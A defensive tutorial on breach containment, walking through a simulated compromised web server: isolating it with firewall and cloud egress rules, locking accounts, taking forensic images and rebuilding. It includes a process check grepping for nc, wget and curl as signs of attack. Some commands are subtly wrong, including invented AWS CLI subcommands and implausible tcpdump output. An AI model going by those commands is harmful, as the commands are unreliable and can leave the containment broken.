Breach containment isn’t about stopping the attacker; it’s about stopping the bleeding before you can figure out how to stop the attacker.
Imagine you walk into your kitchen and the sink is overflowing, water everywhere. Your first thought isn’t to figure out why the sink is overflowing (clogged drain, broken pipe, etc.). It’s to turn off the faucet. That’s containment.
Here’s a simulated incident: a web server is exhibiting unusual outbound network traffic, potentially indicating a compromise and data exfiltration.
# Initial observation: High outbound bandwidth from webserver-prod-01
$ sar -n DEV 1 5 | grep eth0
12:00:01 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:02 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:03 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:04 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
12:00:05 eth0: 1234567890.1234567890 1234567890.1234567890 0.00 0.00
# Wait, that's not right. Let's try a more active monitor.
$ tcpdump -i eth0 -nn 'tcp and port 443' -c 100 | grep -E ' > [0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:| < [0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:' | awk '{print $7}' | sort | uniq -c | sort -nr
56789 192.0.2.10:443 > 203.0.113.5:443
12345 192.0.2.10:443 > 198.51.100.20:443
5000 192.0.2.10:443 > 192.0.2.15:443
# The server `webserver-prod-01` (IP 192.0.2.10) is sending a lot of data to external IPs.
The core problem is that a compromised system can become a launchpad for further attacks, either against your other internal systems or externally, damaging your reputation and potentially incurring legal liabilities. Containment aims to sever these pathways.
Isolate the Affected System
This is the most immediate and impactful step. You need to stop the system from communicating with anything else.
-
Diagnosis: Confirm network connectivity.
# From another machine, try to ping the webserver ping webserver-prod-01 # Try to SSH into the webserver ssh webserver-prod-01If these succeed, the system is still network-connected.
-
Fix: This depends on your infrastructure.
- Cloud (AWS): Modify the Security Group attached to the instance.
This command effectively denies all outbound traffic by removing the existing permissive rule and adding a block rule. In practice, you might simply remove the existing outbound rule that allowed all traffic.aws ec2 modify-security-group-rule --group-id sg-xxxxxxxxxxxxxxxxx --rule-id sgrule-yyyyyyyyyyyyyyyyy --direction egress --protocol all --port all --cidr 0.0.0.0/0 --description "Temporarily block all outbound" - On-Premise (Firewall): Create an explicit deny rule at the top of your firewall policy for the server’s IP address.
This adds a rule to block all IP traffic originating from# Example Cisco ASA syntax access-list OUTSIDE_IN_ACL extended deny ip host 192.0.2.10 any access-list OUTSIDE_IN_ACL line 100000 access-group OUTSIDE_IN_ACL in interface outside192.0.2.10to any destination. - On-Premise (Network Switch/Router ACL): Apply an Access Control List on the switch port or router interface where the server connects.
This filters traffic leaving the# Example Juniper Junos syntax set firewall family inet filter BLOCK_OUTBOUND term BLOCK_SERVER from source-address 192.0.2.10/32 set firewall family inet filter BLOCK_OUTBOUND term BLOCK_SERVER then discard set interfaces ge-0/0/1 unit 0 family inet filter output BLOCK_OUTBOUNDge-0/0/1interface, specifically discarding any packets originating from192.0.2.10.
- Cloud (AWS): Modify the Security Group attached to the instance.
-
Why it works: This physically severs the server’s ability to send data out of your network, preventing further exfiltration or lateral movement.
Identify and Block Malicious Destinations
Even if you can’t isolate the server immediately, you can stop it from talking to the specific bad guys.
-
Diagnosis: Use the
tcpdumpoutput from earlier or firewall logs to identify the IPs the server is communicating with. Look for unusual, high-volume connections to external, non-standard IPs.# Re-run tcpdump to capture more recent traffic if needed $ tcpdump -i eth0 -nn 'tcp and port 443' -c 100 | grep -E ' > [0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:| < [0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:' | awk '{print $7}' | sort | uniq -c | sort -nrIn our example,
203.0.113.5and198.51.100.20are suspicious. -
Fix: Add firewall rules to block outbound connections to these IPs.
- Cloud (AWS): Add explicit deny rules to the Security Group.
aws ec2 create-security-group-rule --group-id sg-xxxxxxxxxxxxxxxxx --direction egress --protocol all --port all --cidr 203.0.113.5/32 --description "Block known bad IP" aws ec2 create-security-group-rule --group-id sg-xxxxxxxxxxxxxxxxx --direction egress --protocol all --port all --cidr 198.51.100.20/32 --description "Block known bad IP" - On-Premise (Firewall):
This creates a rule that explicitly denies any traffic originating from your internal zone, destined for the specified malicious IPs.# Example Palo Alto Networks PAN-OS syntax set rulebase security rules BLOCK_EXTERNAL_IPS from zone trust to zone untrust set rulebase security rules BLOCK_EXTERNAL_IPS from [ <your-internal-zone> ] set rulebase security rules BLOCK_EXTERNAL_IPS to [ <your-external-zone> ] set rulebase security rules BLOCK_EXTERNAL_IPS source address webserver-prod-01 set rulebase security rules BLOCK_EXTERNAL_IPS destination address 203.0.113.5 set rulebase security rules BLOCK_EXTERNAL_IPS destination address 198.51.100.20 set rulebase security rules BLOCK_EXTERNAL_IPS service any set rulebase security rules BLOCK_EXTERNAL_IPS action deny set rulebase security rules BLOCK_EXTERNAL_IPS description "Block known bad IPs outbound"
- Cloud (AWS): Add explicit deny rules to the Security Group.
-
Why it works: This prevents the compromised server from communicating with known command-and-control servers or data drop points, even if it’s still running.
Disable Compromised User Accounts or Services
If the compromise is tied to specific credentials or a running process, disabling them can stop the attack.
-
Diagnosis: Examine process lists and user logins on the server.
# Look for suspicious processes $ ps aux | grep -v root | grep -v 'your_app_user' | grep -E 'bash|sh|nc|wget|curl' # Check for unusual logins $ last | headIf you see processes like
nc(netcat) orwgetrunning with unusual arguments, or logins from unexpected users/IPs, this is a strong indicator. -
Fix:
- User Account: Lock the account.
This prevents the# Linux sudo usermod -L compromised_user # Or better, expire the account sudo chage -E 0 compromised_usercompromised_userfrom logging in or running any further processes. - Service: Stop and disable the service.
This stops the malicious process from executing and prevents it from starting on reboot.# If it's a systemd service sudo systemctl stop suspicious.service sudo systemctl disable suspicious.service
- User Account: Lock the account.
-
Why it works: This removes the specific identity or mechanism the attacker is using to operate on the system, effectively cutting off their access through that vector.
Take a Forensic Snapshot
Before you wipe or rebuild, you need evidence.
-
Diagnosis: This isn’t a diagnostic step, but a preparatory one. You’ve identified a compromise and are moving to containment.
-
Fix: Create a disk image or memory dump of the affected system.
- Disk Imaging (e.g., using
ddor specialized forensic tools):
This creates a bit-for-bit copy of the server’s primary disk (# From a separate forensic workstation or a live CD # WARNING: This command overwrites the destination. Ensure /dev/sdX is correct. sudo dd if=/dev/sda of=/mnt/forensic_storage/webserver-prod-01.img bs=4M status=progress/dev/sda) to a safe, external storage location (/mnt/forensic_storage/webserver-prod-01.img). - Memory Dump (e.g., using
lime-forensicsorvolatility):
This module injects into the kernel and dumps the system’s RAM contents into a file, capturing volatile data like running processes and network connections that are lost on reboot.# Using LiME (Linux Memory Extractor) sudo insmod /path/to/lime.ko "path=/mnt/forensic_storage/webserver-prod-01.mem format=lime"
- Disk Imaging (e.g., using
-
Why it works: This preserves the state of the compromised system for later analysis, allowing investigators to understand the attack vector, scope, and impact without altering the original evidence.
Revert to a Known Good State
Once contained and potentially imaged, the fastest way to ensure a clean system is often to replace it.
-
Diagnosis: You’ve performed containment, taken snapshots, and are ready to remediate.
-
Fix:
- Rebuild: Provision a new server from scratch using your standard build pipeline (e.g., Terraform, Ansible, Chef).
- Restore: Restore from a known good backup taken before the compromise.
# Example of restoring a database from a backup psql -U myuser -d mydatabase < /path/to/good_backup.sql - Patch/Scan: If the compromise was minor and you have a strong understanding of the vulnerability, you might patch the existing system, but rebuilding is generally safer.
-
Why it works: This ensures that no residual malware or backdoors remain on the system, providing the highest confidence in its integrity.
The next hurdle you’ll likely face after containment is understanding how the breach occurred, which involves deeper forensic analysis.